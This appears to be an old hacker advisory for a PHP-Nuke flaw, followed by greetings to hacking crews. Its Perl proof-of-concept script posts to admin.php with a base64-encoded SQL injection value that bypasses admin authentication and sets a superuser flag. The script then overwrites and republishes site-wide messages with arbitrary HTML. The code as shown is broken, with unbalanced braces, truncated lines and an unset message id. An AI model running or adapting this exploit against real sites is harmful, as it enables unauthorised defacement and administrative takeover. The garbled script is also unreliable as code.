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[XSS]/SQL Injection PHP-Nuke Edit/Save Message(s) Bug

[XSS]/SQL Injection PHP-Nuke Edit/Save Message(s) Bug by bima_

Php-Nuke is a popular freeware content management system.

Based on information at :

An attacker permitted to post to global home-page messages, and/or then deleted 

I found that we can edit and then saving the change of message(s) too.

I wrote a little perl script to prove it, i used POST method,
to avoid the current php-nuke protection.
This script will edit :
[+] message's title
[+] message's content
[+] message's expired to unlimited
[+] message's active to yes
[+] message's view to all visitors
and then save the change of message(s).

Here it is :

******cut here**************

use LWP; 

$log   = "pos_komen_phpnuke_savemsg.txt"; 
$Agent  = "Mbahmubangga/1.0";
$proxy  = "";;    # proxy:port ...
$browser = LWP::UserAgent->new;
$browser -> agent($Agent);

$url = 'http://www.sitewithphpnuke.com/admin.php';

$browser->proxy(http => $proxy) if defined($proxy);

printlog ("\nProcessing: $url\n");

for ($a = 1; $a < 11 ; $a++) {


   $loginpost = $url;
   $loginrequest = HTTP::Request->new(POST => $loginpost);
   $loginsend = 
        'title=<h1>JUST TESTING</h1>'.
        '&content=you can put HTML format here, all up to you now, 1 liner of 
course, or multiple liner with dot'.
        '&mlanguage='. #message language
        '&expire=0'. #unlimited
        '&active=1'. #yes
        '&view=1'. #all visitors
        '&mid='.$mid. #the message id, commonly has value under 11
        '&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox'. #our magic ammo ==> 
        '&add_radminsuper=1'. #the super user / G O D
        '&op=savemsg'; #operation
   $loginresponse = $browser->request($loginrequest);
   $logincek = $loginresponse->as_string;
   #print ($logincek);

if ($logincek =~ /(500 Can\'t read entity body\: Unknown error)|(411 Length 
      printlog ("$mid attempting edit and saving message sending OK 
".$loginresponse->status_line ."\n") ;
   else {
      printlog ("Could be failure ".$loginresponse->status_line ."\n");

} #end of for

sub printlog {
 print @_[0]; 
 print lo @_[0];
******cut here**************

And then you can see the log called : pos_komen_phpnuke_savemsg.txt


*very very very special greetz to:
[+][+][+] my beloved anna [+][+][+]

*shout to dhanny firman syah : keep fighting, bro...

*special greetz to: 
[+] www.neoteker.or.id
[+] www.echo.or.id
[+] www.bosen.net
[+] www.waraxe.us
[+] qq
[+] tiyox
[+] bosen
[+] ftp_geo
[+] tiong
[+] all #1stlink #neoteker #e-c-h-o #batamhacker #kartubeben #antihackerlink 
crew @ dal net
[+] all #1stlink #romance #hackers @ centrin
[+] sj, alphacentupret, fuzk3 kendi
[+] boeboe (dah kehabisan target yach...)
[+] y3d1ps, z3r0byt3, biatch-x, K-159, Cmaster4

[+] iko94(at)yahoo(dot)com
[+] www.geocities.com/iko94
[+] www.neoteker.or.id